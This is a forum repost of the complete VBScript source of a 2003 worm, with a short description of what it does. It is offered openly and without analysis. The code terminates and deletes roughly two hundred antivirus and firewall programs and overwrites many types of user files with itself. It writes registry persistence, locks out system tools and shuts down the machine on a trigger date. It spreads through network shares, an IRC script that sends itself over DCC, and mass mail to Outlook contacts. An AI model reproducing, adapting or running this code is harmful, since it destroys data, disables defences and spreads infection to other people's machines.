[Repost] A VBS virus that can delete antivirus software and damage hardware

Author: sgl
Source: EvilOctal Information Security Team (邪恶八进制信息安全团队, www.eviloctal.com)

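This script virus can kill or delete the processes and files of dozens of antivirus and firewall products, carries the CIH virus, and uses random email subjects and bodies. It spreads and attacks over the LAN (with simplified network code), and mainly infects files inside antivirus software.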

Rem I like Virus!
Rem writen by W.Z.T /tthacker@eyou.com 12.15.2003
on error resume next
set fso=createobject("scripting.filesystemobject")
set a=createobject("wscript.shell")
Set dir1=fso.GetSpecialFolder(0)
set dir2=fso.GetSpecialFolder(1)
Set k=fso.GetFile(WScript.ScriptFullName)
k.Copy(dir2&"\system.vbe")
k.Copy(dir1&"\Windows.vbe")
set ag=fso.createtextfile(dir1&"\kill.vbe")
ag.writeline "on error resume next"
ag.writeline "do"
ag.writeline "strComputer = ""."""
ag.writeline "Set objWMIService = GetObject(""winmgmts:"" & ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")"
ag.writeline "dim fv(216)"
ag.writeline "fv(1)=""pccguide.exe"""
ag.writeline "fv(2)=""PCCClient.exe"""
ag.writeline "fv(3)=""Rfw.exe"""
ag.writeline "fv(4)=""DAVPFW.exe"""
ag.writeline "fv(5)=""VPC32.exe"""
ag.writeline "fv(6)=""RavMon.exe"""
ag.writeline "fv(7)=""debu.exe"""
ag.writeline "fv(8)=""scan.exe"""
ag.writeline "fv(9)=""mon.exe"""
ag.writeline "fv(10)=""vir.exe"""
ag.writeline "fv(11)=""iom.exe"""
ag.writeline "fv(12)=""ice.exe"""
ag.writeline "fv(13)=""anti.exe"""
ag.writeline "fv(14)=""fir.exe"""
ag.writeline "fv(15)=""prot.exe"""
ag.writeline "fv(16)=""secu.exe"""
ag.writeline "fv(17)=""dbg.exe"""
ag.writeline "fv(18)=""pcc.exe"""
ag.writeline "fv(19)=""avk.exe"""
ag.writeline "fv(20)=""spy.exe"""
ag.writeline "fv(21)=""pcciomon.exe"""
ag.writeline "fv(22)=""pccmain.exe"""
ag.writeline "fv(23)=""pop3trap.exe"""
ag.writeline "fv(24)=""webtrap.exe"""
ag.writeline "fv(25)=""vshwin32.exe"""
ag.writeline "fv(26)=""vsstat.exe"""
ag.writeline "fv(27)=""navapw32.exe"""
ag.writeline "fv(28)=""lucomserver.exe"""
ag.writeline "fv(29)=""lamapp.exe"""
ag.writeline "fv(30)=""atrack.exe"""
ag.writeline "fv(31)=""nisserv.exe"""
ag.writeline "fv(32)=""vavrunr.exe"""
ag.writeline "fv(33)=""navwnt.exe"""
ag.writeline "fv(34)=""pview95.exe"""
ag.writeline "fv(35)=""luall.exe"""
ag.writeline "fv(36)=""avxonsol.exe"""
ag.writeline "fv(37)=""avsynmgr.exe"""
ag.writeline "fv(38)=""symproxysvc.exe"""
ag.writeline "fv(39)=""regedit.exe"""
ag.writeline "fv(40)=""smtpsvc.exe"""
ag.writeline "fv(41)=""moniker.exe"""
ag.writeline "fv(42)=""program.exe"""
ag.writeline "fv(42)=""explorewclass.exe"""
ag.writeline "fv(43)=""rn.exe"""
ag.writeline "fv(44)=""ms.exe"""
ag.writeline "fv(45)=""microsoft.exe"""
ag.writeline "fv(46)=""ms.exe"""
ag.writeline "fv(47)=""office.exe"""
ag.writeline "fv(48)=""smtpsvc.exe"""
ag.writeline "fv(49)=""POP3TRAP.exe"""
ag.writeline "fv(50)=""WEBTRAP.exe"""
ag.writeline "fv(51)=""AVCONSOL.exe"""
ag.writeline "fv(52)=""AVSYNMGR.exe"""
ag.writeline "fv(53)=""VSHWIN32.exe"""
ag.writeline "fv(54)=""VSSTAT.exe"""
ag.writeline "fv(55)=""NAVAPW32.exe"""
ag.writeline "fv(56)=""NAVW32.exe"""
ag.writeline "fv(57)=""NMAIN.exe"""
ag.writeline "fv(58)=""LUALL.exe"""
ag.writeline "fv(59)=""LUCOMSERVER.exe"""
ag.writeline "fv(60)=""IAMAPP.exe"""
ag.writeline "fv(61)=""ATRACK.exe"""
ag.writeline "fv(62)=""nisserv.exe"""
ag.writeline "fv(63)=""rescue32.exe"""
ag.writeline "fv(64)=""symproxysvc.exe"""
ag.writeline "fv(65)=""nisum.exe"""
ag.writeline "fv(66)=""navapsvc.exe"""
ag.writeline "fv(67)=""navlu32.exe"""
ag.writeline "fv(68)=""navrunr.exe"""
ag.writeline "fv(69)=""pview95.exe"""
ag.writeline "fv(70)=""f-stopw.exe"""
ag.writeline "fv(71)=""f-prot95.exe"""
ag.writeline "fv(72)=""Pccwin98.exe"""
ag.writeline "fv(73)=""iomon98.exe"""
ag.writeline "fv(74)=""fp-win.exe"""
ag.writeline "fv(75)=""nvc95.exe"""
ag.writeline "fv(76)=""norton.exe"""
ag.writeline "fv(77)=""mcafee.exe"""
ag.writeline "fv(78)=""antivir.exe"""
ag.writeline "fv(79)=""webscanx.exe"""
ag.writeline "fv(80)=""safeweb.exe"""
ag.writeline "fv(81)=""cfinet.exe"""
ag.writeline "fv(82)=""cfinet32.exe"""
ag.writeline "fv(83)=""avp.exe"""
ag.writeline "fv(84)=""lockdown2000.exe"""
ag.writeline "fv(85)=""avp32.exe"""
ag.writeline "fv(86)=""zonealarm.exe"""
ag.writeline "fv(87)=""wink.exe"""
ag.writeline "fv(88)=""sirc32.exe"""
ag.writeline "fv(89)=""scam32.exe"""
ag.writeline "fv(90)=""regedit.exe"""
ag.writeline "fv(91)=""TMOAgent.exe"""
ag.writeline "fv(92)=""Tmntsrv.exe"""
ag.writeline "fv(93)=""tmproxy.exe"""
ag.writeline "fv(94)=""tmupdito.exe"""
ag.writeline "fv(95)=""TSC.exe"""
ag.writeline "fv(96)=""KRF.exe"""
ag.writeline "fv(97)=""KPFW32.exe"""
ag.writeline "fv(98)=""_AVPM.exe"""
ag.writeline "fv(99)=""AUTODOWN.exe"""
ag.writeline "fv(100)=""AVKSERV.exe"""
ag.writeline "fv(101)=""AVPUPD.exe"""
ag.writeline "fv(102)=""BLACKD.exe"""
ag.writeline "fv(103)=""CFIND.exe"""
ag.writeline "fv(104)=""CLEANER.exe"""
ag.writeline "fv(105)=""ECENGINE.exe"""
ag.writeline "fv(106)=""F-PROT.exe"""
ag.writeline "fv(107)=""FP-WIN.exe"""
ag.writeline "fv(108)=""IAMSERV.exe"""
ag.writeline "fv(109)=""ICLOADNT.exe"""
ag.writeline "fv(110)=""LOOKOUT.exe"""
ag.writeline "fv(111)=""N32ACAN.exe"""
ag.writeline "fv(112)=""NAVW32.exe"""
ag.writeline "fv(113)=""NORMIST.exe"""
ag.writeline "fv(114)=""PADMIN.exe"""
ag.writeline "fv(115)=""pccwin98.exe"""
ag.writeline "fv(116)=""rav7win.exe"""
ag.writeline "fv(117)=""SMC.exe"""
ag.writeline "fv(118)=""TCA.exe"""
ag.writeline "fv(119)=""VETTRAY.exe"""
ag.writeline "fv(120)=""VSSTAT.exe"""
ag.writeline "fv(121)=""ACKWIN32.exe"""
ag.writeline "fv(123)=""AVCONSOL.exe"""
ag.writeline "fv(124)=""AVPNT.exe"""
ag.writeline "fv(125)=""avpdos32.exe"""
ag.writeline "fv(126)=""AVSCHED32.exe"""
ag.writeline "fv(127)=""BLACKICE.exe"""
ag.writeline "fv(128)=""EFINET32.exe"""
ag.writeline "fv(129)=""CLEANER3.exe"""
ag.writeline "fv(130)=""ESAFE.exe"""
ag.writeline "fv(131)=""F-PROT95.exe"""
ag.writeline "fv(132)=""IBMASN.exe"""
ag.writeline "fv(133)=""ICMOON.exe"""
ag.writeline "fv(134)=""IOMON98.EXE"""
ag.writeline "fv(135)=""LUALL.EXE"""
ag.writeline "fv(136)=""NAVAPW32.EXE"""
ag.writeline "fv(137)=""NAVWNT.EXE"""
ag.writeline "fv(138)=""NUPGRADE.EXE"""
ag.writeline "fv(139)=""PAVCL.EXE"""
ag.writeline "fv(140)=""PCFWALLICON.EXE"""
ag.writeline "fv(141)=""PCFWALLICON.EXE"""
ag.writeline "fv(142)=""SCANPM.EXE"""
ag.writeline "fv(143)=""SPHINX.EXE"""
ag.writeline "fv(144)=""TDS2-98.EXE"""
ag.writeline "fv(145)=""VSSCAN40"""
ag.writeline "fv(146)=""WEBSCANX.EXE"""
ag.writeline "fv(147)=""WEBSCAN.EXE"""
ag.writeline "fv(148)=""ANTI-TROJAN.EXE"""
ag.writeline "fv(149)=""AVE32.EXE"""
ag.writeline "fv(150)=""AVP.EXE"""
ag.writeline "fv(151)=""AVPM.EXE"""
ag.writeline "fv(152)=""AVWIN95.EXE"""
ag.writeline "fv(153)=""CFIADMIN.EXE"""
ag.writeline "fv(154)=""CLAW95.EXE"""
ag.writeline "fv(155)=""DVP95.EXE"""
ag.writeline "fv(156)=""ESPWATCH.EXE"""
ag.writeline "fv(157)=""F-STOPW.EXE"""
ag.writeline "fv(158)=""FRW.EXE"""
ag.writeline "fv(159)=""IBMAVSP.EXE"""
ag.writeline "fv(160)=""ICSUPP95"""
ag.writeline "fv(161)=""JED.EXE"""
ag.writeline "fv(162)=""MOOLIVE.EXE"""
ag.writeline "fv(163)=""NAVLU32.EXE"""
ag.writeline "fv(164)=""NISUM.EXE"""
ag.writeline "fv(165)=""NVC95.EXE"""
ag.writeline "fv(166)=""NAVSCHED.EXE"""
ag.writeline "fv(167)=""PERSFW.EXE"""
ag.writeline "fv(168)=""SAFEWEB.EXE"""
ag.writeline "fv(169)=""SCRSCAN.EXE"""
ag.writeline "fv(170)=""SWEEP95.EXE"""
ag.writeline "fv(171)=""TDS2-NT.EXE"""
ag.writeline "fv(172)=""VSECOMR.EXE"""
ag.writeline "fv(173)=""WFINDV32.EXE"""
ag.writeline "fv(174)=""AVPCC.EXE"""
ag.writeline "fv(175)=""_AVPCC.EXE"""
ag.writeline "fv(176)=""APVXDWIN.EXE"""
ag.writeline "fv(177)=""AVGCTRL.EXE"""
ag.writeline "fv(178)=""_AVP32.EXE"""
ag.writeline "fv(179)=""AVPTC32.EXE"""
ag.writeline "fv(180)=""CFIAUDIT.EXE"""
ag.writeline "fv(181)=""CLAW95CT.EXE"""
ag.writeline "fv(182)=""DV95_O.EXE"""
ag.writeline "fv(183)=""DV95.EXE"""
ag.writeline "fv(184)=""F-AGNT95.EXE"""
ag.writeline "fv(185)=""FINDVIRU.EXE"""
ag.writeline "fv(186)=""IAMAPP.EXE"""
ag.writeline "fv(187)=""ICLOAD95.EXE"""
ag.writeline "fv(188)=""ICSSUPPNT.EXE"""
ag.writeline "fv(199)=""LOCKDOWN2000.EXE"""
ag.writeline "fv(200)=""MPFTRAY.EXE"""
ag.writeline "fv(201)=""NAVNT.EXE"""
ag.writeline "fv(202)=""NMAIN.EXE"""
ag.writeline "fv(203)=""OUTPOST.EXE"""
ag.writeline "fv(204)=""NAVW.EXE"""
ag.writeline "fv(205)=""RAV7.EXE"""
ag.writeline "fv(206)=""SCAN32.EXE"""
ag.writeline "fv(207)=""SERV95.EXE"""
ag.writeline "fv(208)=""TBSCAN.EXE"""
ag.writeline "fv(209)=""VET95.EXE"""
ag.writeline "fv(210)=""VSHWIN32.EXE"""
ag.writeline "fv(211)=""ZONEALARM.EXE"""
ag.writeline "fv(212)=""AVPMON.EXE"""
ag.writeline "fv(213)=""AVP32.EXE"""
ag.writeline "fv(214)=""windows优化大师.EXE"""
ag.writeline "fv(215)=""NOTEPAD.EXE"""
ag.writeline "fv(215)=""scon.exe"""
ag.writeline "fv(216)=""avpcc.exe"""
ag.writeline "for Each fa in fv"
ag.writeline "Set colProcessList = objWMIService.ExecQuery (""Select * from Win32_Process Where Name = '""&fa&""'"")"
ag.writeline "For Each objProcess in colProcessList"
ag.writeline "objProcess.Terminate()"
ag.writeline "Next"
ag.writeline "next"
ag.writeline "loop"
ag.close
a.run "kill.vbe"
Set ai=fso.GetFile(dir1&"\kill.vbe")
ai.attributes=ai.attributes+2
Set cc=fso.CreateTextFile(dir1&"\Run.bat")
cc.WriteLine "@echo off"
cc.WriteLine "@doskey cls=Wangzhitongisthebest!"
cc.WriteLine "@doskey cd=Wangzhitongisthebest!"
cc.WriteLine "@doskey copy=Wangzhitongisthebest!"
cc.WriteLine "@doskey rd=Wangzhitongisthebest!"
cc.WriteLine "@doskey dir=Wangzhitongisthebest!"
cc.WriteLine "@doskey exit=Wangzhitongisthebest!"
cc.WriteLine "@del c:\winnt\system32\doskey.exe"
cc.WriteLine "cls"
cc.WriteLine "echo 1st.Never damage any syatem. This will only get into trouble."
cc.WriteLine "echo 2nd.Never alter any of the systems files ,except for those needed to insure that you are not detected, and thsoeto insurethat you have access into that computer in the future."
cc.WriteLine "echo 3rd.Do not share any informatrion about you hacking projects with anyone but those you'd trust."
cc.WriteLine "echo 4th.When psoting on BBS's be as bague as possible when describing your current hacking projects.BBS's CAn be monitered by law enforcement."
cc.WriteLine "echo 5th.Never use anyone's real name or real phone number when posting on a BBS."
cc.WriteLine "echo 6th.Never leave your handle on any systems that you hack in to."
cc.WriteLine "echo 7th.Do not hack government computers."
cc.WriteLine "echo 8th.Never speak about hacking projects over your home telephone line."
cc.WriteLine "echo 9th.Be paranoid,Keep all of your hacking materials in a sate place."
cc.WriteLine "echo 10th.To become a real hacker, you have to hack. You can't just sit around reading test files and hanging out on BBS's. This is not what hacking is all about."
cc.WriteLine "echo W.Z.T 明年就要上大学了!  我最爱的人是小鱼儿,但她以不属于我了,祝她幸福."
cc.WriteLine "echo                %date% %time%"
cc.WriteLine "echo             中国黑客会成为世界最好的!"
cc.WriteLine "prompt $P$G$$$_*tthacker@eyou.com*"
cc.WriteLine "echo on"
cc.close
Set at=fso.GetFile(dir1&"\Run.bat")
at.attributes=at.attributes+2
set sii=fso.CreateTextFile(dir2&"\event.ini")
sii.WriteLine "[Levels]"
sii.WriteLine "Enabled=1"
sii.WriteLine "Count=6"
sii.WriteLine "Level1=000-Unknowns"
sii.WriteLine "000-UnknownsEnabled=1"
sii.WriteLine "Level2=100-Level 100"
sii.WriteLine "100-Level 100Enabled=1"
sii.WriteLine "Level3=200-Level 200"
sii.WriteLine "200-Level 200Enabled=1"
sii.WriteLine "Level4=300-Level 300"
sii.WriteLine " 300-Level 300Enabled=1"
sii.WriteLine "Level5=400-Level 400 "
sii.WriteLine "400-Level 400Enabled=1"
sii.WriteLine "Level6=500-Level 500"
sii.WriteLine "500-Level 500Enabled=1"
sii.WriteLine ""
sii.WriteLine "[000-Unknowns]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.WriteLine ""
sii.WriteLine "[100-Level 100]"
sii.WriteLine "User1=*!*@*"
sii.WriteLine "UserCount=1"
sii.WriteLine "Event1=ON JOIN:#:/dcc tsend $nick " & fso.getspecialfolder(1) & "\system.vbe"
sii.WriteLine "EventCount=1"
sii.WriteLine ""
sii.WriteLine "[200-Level 200]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.WriteLine ""
sii.WriteLine "[300-Level 300]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.WriteLine ""
sii.WriteLine "[400-Level 400]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.WriteLine ""
sii.WriteLine "[500-Level 500]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.Close
set wi=fso.GetFile(dir2&"\event.ini")
wi.attributes=attributes+2
Set rei=fso.CreateTextFile(dir1&"\check.vbe")
rei.WriteLine "On Error Resume Next"
rei.WriteLine "Dim bb, aa, cc"
rei.WriteLine "Set cc=CreateObject(""WScript.Shell"")"
rei.WriteLine "aa=Minute(time)"
rei.WriteLine "bb=aa"
rei.WriteLine "do"
rei.WriteLine "bb=Minute(time)"
rei.WriteLine "loop until aa>=bb+1"
rei.WriteLine "cc.run ""system.vbe"""
rei.Close
a.run "check.vbe"
set ahd=fso.GetFile(dir1&"\check.vbe")
ahd.attributes=attributes+2
set ah=fso.GetFile(dir2&"\wscript.exe")
ah.attributes=attributes+2
set bh=fso.GetFile(dir2&"\cscript.exe")
bh.attributes=attributes+2
Set apq=fso.CreateTextFile(dir2&"\system.inf")
apq.WriteLine "[Autorun]"
apq.WriteLine "open=system.vbs"
apq.Close
Set pr=fso.GetFile(dir2&"\system.inf")
pr.attributes=attributes+2
kill()
regruns()
listadriv()
juyu()
mail()


Sub kill()
Set fso = createobject("scripting.filesystemobject")
Set aa = createobject("wscript.shell")
bb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
vv = GV0A7543(bb)
Set tt = fso.createtextfile(fso.getspecialfolder(0) & "\rav.exe",true)
tt.write vv
tt.close
aa.run fso.getspecialfolder(0) & "\rav.exe", 1, false
GV0A7543(K24L97UF)
end sub

Function GV0A7543(K24L97UF)
For HB9DDRD2 = 1 To Len(K24L97UF) Step 2
GV0A7543 = GV0A7543 & Chr("&h" & Mid(K24L97UF, HB9DDRD2, 2))
Next
End Function


Sub regruns()
On Error Resume Next
set a=createobject("wscript.shell")
kj="HKCU\Software\Microsoft\Windows\CurrentVersion\"
ki="HKLM\Software\Microsoft\Windows\CurrentVersion\"
key=CInt(Month(Date)+Day(Date))
if key=23 then
a.RegWrite kj&"Internet Settings\NoNetAutodial", 01, "REG_BINARY"
a.run "rundll32.exe shell32.dll,SHExitWindowsEx2"
a.run "ping -l 65500 -t www.Mirosoft.com", 0
end if
a.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
a.RegWrite kj&"Policies\System\DisableRegistryTools", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Explorer\NoFolderOptions", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Uninstall\NoAddFromCDorFloppy", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Uninstall\NoAddRemovePrograms", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Uninstall\NoAddRemovePage", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Uninstall\NoWindowsSetupPage",  "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Explorer\Advanced\Folder\Hidden\SHOWALL\checkedvalue", "00000001",  "REG_DWORD"
a.RegWrite "HKLM\Software\CLASSES\.reg", "txtfile"
a.RegWrite "HKLM\Software\Microsoft\Command Processor\AutoRun", "%systemroot%\run.bat&system32.vbe", "REG_SZ"
a.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\system", dir1&"\windows.vbe"
End sub

sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 1 or d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path & "\")
end if
Next
listadriv = s
end sub

sub infectfiles(folderspec)  
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3,fso, file,si
eq=""
Set fso=CreateObject("Scripting.FilesystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopy=file.ReadAll
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
s = lcase(f1.name)
if (ext = "bmp") or (ext="bak") or (ext="pfg") or (ext="ppl")  or (ext="bin") or (ext="sig") or(ext="vdb") or(ext="dat") or (ext="gif") or (ext="doc") or (ext="xls")  or (ext="TSK") or (ext="Ipt$vpn.630") or (ext="tmp") or (ext="VDB")or (ext="VLG") or (ext="dsc") or (ext="ptn") or (ext="set") or (ext="log") or (ext="jpg") or (ext="cfg") or (ext="idx") or (ext="rec") then
set ap = fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
else if (ext = "htt") then
set di=fso.opentextfile(f1.path, 8, true)
di.writeline "<html>"
di.writeline "<head>"
di.writeline "</head>"
di.writeline "<script language=""vbscript"">"
di.writeline "<!--"
di.write    vbscopy
di.writeline "-->"   
di.writeline "</script>"
di.writeline "<BODY onload=""vbscript:main()"">"
di.writeline "</body>"
di.write    "</html>"
di.close
end if
end if
b=fso.GetBaseName(f1.path)
if (b = "Patch") or (b = "Tmntsrv") or (b="TSC") or (b = "TRA") or (b ="avpm") or (b = "avp32") or (b = "spy") or (b = "pcc") or (b = "Rfw") or (b = "DAVPFW") or (b = "VPC32") or (b = "RavMon") or (b = "debu") or (b = "scan") or (b = "mon") or (b = "vir") or (b = "iom") or (b = "ice") or (b = "anti") or (b = "fir") or (b = "prot") or (b = "secu") or (b = "dbg") or (b = "pcc") or (b = "pcciomon") or (b = "pccmain") or (b = "pop3trap")  or (b = "webtrap") or (b = "vshwin32") or (b = "vsstat") or (b = "navapw32") or (b = "lucomserver") or (b = "lamapp") or (b = "atrack") or (b = "nisserv") or (b = "vavrunr") or (b = "navwnt") or (b = "pview95") or (b = "luall") or (b = "avxonsol") or (b = "avsynmgr") or (b = "symproxysvc") or (b = "smtpsvc") or (b = "moniker") or (b = "program") or (b = "explorewclass") or (b = "rn") or (b = "ms") or (b = "microsoft") or (b = "smtpsvc") or (b = "WEBTRAP") or (b = "AVCONSOL") or (b = "AVSYNMGR") or (b = "VSHWIN32") or (b = "VSSTAT") or (b = "NAVAPW32") or (b = "NAVW32") or (b = "NMAIN") or (b = "LUALL") or (b = "LUCOMSERVER") or (b = "IAMAPP") or (b = "ATRACK") or (b = "nisserv") or (b = "rescue32") or (b = "symproxysvc") or (b = "nisum") or (b = "navapsvc") or (b = "navlu32") or (b = "navrunr") or (b = "pview95") or (b = "f-stopw") or (b = "f-prot95.") or (b = "Pccwin98") or (b = "iomon98") or (b = "fp-win") or (b = "nvc95") or (b = "norton") or (b = "mcafee") or (b = "antivir") or (b = "webscanx") or (b = "safeweb") or (b = "cfine") or (b = "avp") or (b = "lockdown2000") or (b = "avp32") or (b = "zonealarm") or (b = "wink") or (b = "sirc32") or (b = "scam32") or (b = "TMOAgent") or (b = "Tmntsrv") or (b = "tmproxy") or (b = "tmupdito") or (b = "TSC") or (b = "KRF") or (b = "KPFW32") or (b = "_AVPM") or (b = "AUTODOWN") or (b = "AVKSERV") or (b = "AVPUPD") or (b = "BLACKD") or (b = "CFIND") or (b = "CLEANER") or (b = "ECENGINE") or (b = "F-PROT") or (b = "FP-WIN") or (b = "IAMSERV") or (b = "ICLOADNT") or (b = "LOOKOUT") or (b = 
"N32ACAN") or (b = "NAVW32") or (b = "NORMIST") or (b = "PADMIN") or (b = "pccwin98") or (b = "rav7win") or (b = "SMC") or (b = "TCA") or (b = "VETTRAY") or (b = "VSSTAT.") or (b = "ACKWIN32") or (b = "AVCONSOL") or (b = "AVPNT") or (b = "avpdos32") or (b = "AVSCHED32") or (b = "BLACKICE") or (b = "EFINET32") or (b = "CLEANER3") or (b = "ESAFE") or (b = "F-PROT95") or (b = "IBMASN") or (b = "ICMOON") or (b = "IOMON98") or (b = "LUALL") or (b = "NAVAPW32") or (b = "NAVWNT") or (b = "NUPGRADE") or (b = "PAVCL") or (b = "PCFWALLICON") or (b = "SCANPM") or (b = "SPHINX") or (b = "TDS2-98") or (b = "VSSCAN40") or (b = "WEBSCANX") or (b = "WEBSCAN") or (b = "ANTI-TROJAN") or (b = "AVE32") or (b = "AVP") or (b = "AVPM") or (b = "AVWIN95") or (b = "CFIADMIN") or (b = "CLAW95") or (b = "DVP95") or (b = "ESPWATCH") or (b = "F-STOPW") or (b = "FRW") or (b = "IBMAVSP") or (b = "ICSUPP95") or (b = "JED") or (b = "MOOLIVE") or (b = "NAVLU32") or (b = "NISUM") or (b = "NVC95") or (b = "NAVSCHED") or (b = "PERSFW") or (b = "SAFEWEB") or (b = "SCRSCAN") or (b = "SWEEP95") or (b = "TDS2-NT") or (b = "VSECOMR") or (b = "WFINDV32") or (b = "AVPCC") or (b = "_AVPCC") or (b = "AVPTC32") or (b = "AVWUPD32") or (b = "CFIAUDIT") or (b = "CLAW95CT") or (b = "DV95_O") or (b = "DV95") or (b = "F-AGNT95") or (b = "FINDVIRU") or (b = "IAMAPP") or (b = "ICLOAD95")  or (b = "ICSSUPPNT") or (b = "MPFTRAY") or (b = "NAVNT") or (b = "NMAIN") or (b = "OUTPOST") or (b = "NAVW") or (b = "RAV7") or (b = "SCAN32") or (b = "SERV95") or (b = "TBSCAN") or (b = "VSHWIN32") or (b = "AVPMON") or (b = "AVP32")  then
set gp = fso.GetFile(f1.path)
gp.Delete
end if
if (eq<>folderspec) then
if (dd = "mirc32.exe")or(dd = "mlink32.exe")or(dd = "mirc.ini")or(dd = "script.ini")or(dd="mirc.hlp")then
Set si = Fso.CreateTextFile(folderspec&"\script.ini")
si.WriteLine "[script]"
si.WriteLine "n0=on *:JOIN:#: if ((($nick != $me) && ($chan != #virus))) { WZT.infect $nick }"
si.WriteLine "n1=alias -l file.name return$gettok(:system.vbe:system.vbe:system.vbe:system.vbe:system.vbe:system.vbe:system.vbe:,$r(1,7),58)"
si.WriteLine "n2=alias WZT.infect {"
si.WriteLine "n3=  %WZT.sock = WZT.send. $+ $rand(100,9000)"
si.WriteLine "n4=  socklisten %WZT.sock"
si.WriteLine "n5=  .timer99 off"
si.WriteLine "n6=  .timer99 1 120 sockclose WZT.send.*"
si.WriteLine "n7=  raw -q privmsg $1 : $+ $chr(1) $+ DCC SEND $file.name $longip($ip) $sock(%WZT.sock).port $file(" & fso.getspecialfolder(1) &"\system.vbe" & ").size $+ $chr(1)"
si.WriteLine "n8=}"
si.WriteLine "n9=on *:socklisten:WZT.send.*:{"
si.WriteLine "n10=  set %WZT.temp WZT.write. $+$gettok($sockname,3,46) | sockaccept %WZT.temp | WZT.send%WZT.temp | sockclose $sockname"
si.WriteLine "n11=}"
si.WriteLine "n12=on *:sockwrite:WZT.write.*:{"
si.WriteLine "n13=  if ($sock($sockname).sent >= $file(" &fs0.getspecialfolder(0) & "\system.vbe" & ").size) sockwrite -n $sockname"
si.WriteLine "n14=  else WZT.send $sockname"
si.WriteLine "n15=}"
si.WriteLine "n16=alias  WZT.send {"
si.WriteLine "n17=  bread " & fso.getspecialfolder(1) & "\system.vbe" & "$sock($sockname).sent 4096 &system.vbe"
si.WriteLine "n18=  sockwrite $1 &system.vbe"
si.WriteLine "n19=}"
si.Close
eq=folderspec
end if
end if
next  
end sub

sub folderlist(folderspec)  
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)  
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next  
end sub

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub

function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget = regedit.RegRead(value)
end function

Sub juyu()
Dim octa, octb, octc,octd,rand,dot,driveconnected,sharename,count
Set fso2=CreateObject("Scripting.FilesystemObject")
count = "0"
dot = "."
driveconnected="0"
Set run = CreateObject("WScript.Shell")
set wshnetwork = wscript.createobject("wscript.network")
on error resume next
randomize
randaddress()

do
do while driveconnected = "0"
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive "j:", sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
run "&sharename&\con\con", 0
loop
end sub

Function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function

function copyfiles()
fso2.copyfile dir2&"\system.vbe", "j:\"
fso2.copyfile dir2&"\system.inf", "j:\"
fso2.copyfile dir2&"\system.vbe", "j:\windows\startm~1\programs\startup\"
fso2.copyfile dir2&"\system.vbe", "j:\windows\"
fso2.copyfile dir2&"\system.vbe", "j:\windows\system32\"
fso2.copyfile dir2&"\system.inf", "j:\windows\system32\"
fso2.copyfile dir2&"\system.vbe", "j:\winnt\system32\"
end function

function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function

function shareformat()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count < 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
end function


Function mail()
on error resume next
Set outlookApp = CreateObject("Outlook.Application")
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI")
Set addrList= mapiObj.AddressLists
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
For addrEntIndex= 1 To addrEntCount
Set item = outlookApp.CreateItem(0)
Set addrEnt = addr.AddressEntries(addrEntIndex)
item.To = addrEnt.Address
Randomize
num = Int((6*Rnd)+1)
if num = 1 then
item.Subject = "Look this!"
elseif num = 2 then
item.Subject = "Catch me!"
elseif num = 3 then
item.Subject = "I am sorry to hear that!"
elseif num = 4 then
item.Subject = "You&#39;re my Baby!"
elseif num = 5 then
item.Subject = "I get the job!"
elseif num = 6 then
item.Subject = "Here is the MM!"
end if
Randomize
nuk = Int((6*Rnd)+1)
if nuk = 1 then
item.Body = "China has setted up his first maned spaceship in the outerspace on Oct.15th!"
elseif nuk = 2 then
item.Body = "I can say that hacker in China will be the best in the world!"
elseif nuk = 3 then
item.Body = "If you must choose the only one between love and cause, which would you choose? Can you tell me?"
elseif nuk = 4 then
item.Body = "You don&#39;t know I am the only man who love you the best? Wo, my darling, please married me!"
elseif nuk = 5 then
item.Body = "China is delovloping!"
elseif nuk = 6 then
item.Body = "I&#39;ll go to the College, please happy for me!"
end if
Set attachMents=item.Attachments
attachMents.Add dir2&"\system.vbe"
item.DeleteAfterSubmit = True
If item.To <> "" Then
item.Send
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1"
End If
Next
End If
Next
End if
End Function
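Human feeling is cold as ice in June; a flower puts on its beauty, but for whom does it smile on the world? If anyone finds that the images in an illustrated article I reposted have broken, or that an article has a problem, please send me a private message promptly. Thanks in advance. ::)) coup de foudre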
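
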